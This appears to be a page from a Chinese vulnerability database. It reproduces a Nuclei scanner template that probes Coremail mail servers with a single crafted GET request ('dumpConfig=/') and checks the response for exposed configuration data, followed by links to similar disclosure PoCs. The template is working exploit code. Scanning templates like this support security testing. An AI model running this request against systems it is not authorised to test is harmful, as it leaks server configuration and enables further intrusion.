coremail-config-disclosure: Coremail - Config Discovery

漏洞描述

PoC代码[已公开]

id: coremail-config-disclosure

info:
  name: Coremail - Config Discovery
  author: princechaddha
  severity: high
  description: Coremail configuration information was discovered.
  reference:
    - https://www.secpulse.com/archives/107611.html
  metadata:
    max-request: 1
  tags: config,exposure,coremail,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<object name=\"cm_md_db\">"
          - 'containerDefinitions'
          - '<string name="User">coremail</string>'
          - '<string name="EnableCoremailSmtp">'
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a004730450220655fcf14ffe010e80942abdff6d514d4afa41e64d0d661e567363c794b6e30aa022100e7825074b737a2f966b43dc9d659fbd098cbfe819cd83af85dfa9ac49cbfca9c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• POC bitrix-log-file-disclosure: Bitrix Site Manager - Log File Disclosure
• POC wp-easy-google-fonts-log-disclosure: WordPress Easy Google Fonts - Error Log Disclosure
• POC wp-importer-log-disclosure: WordPress Importer - Error Log Disclosure
• POC buildpath-file-disclosure: .buildpath - File Disclosure
• POC sharepoint-lists-api-disclosure: Microsoft SharePoint - List API Disclosure
• 友加畅捷管理系统 Sysconfig/GetZTList 未授权访问致信息泄露漏洞
• POC apache-hive-config: Apache Hive Configuration - Exposure
• POC sharepoint-layouts-disclosure: Microsoft SharePoint - Layouts Disclosure
• POC sharepoint-masterpage-disclosure: Microsoft SharePoint - Master Page Disclosure
• POC sharepoint-site-metadata-disclosure: Microsoft SharePoint - Site Metadata Disclosure
• POC sharepoint-sitepages-disclosure: Microsoft SharePoint - Site Pages Disclosure
• POC postgresql-cluster-config: PostgreSQL Cluster - Configuration
• POC unauth-kafka-config-editor: Kafka Config Editor - Unauthenticated Access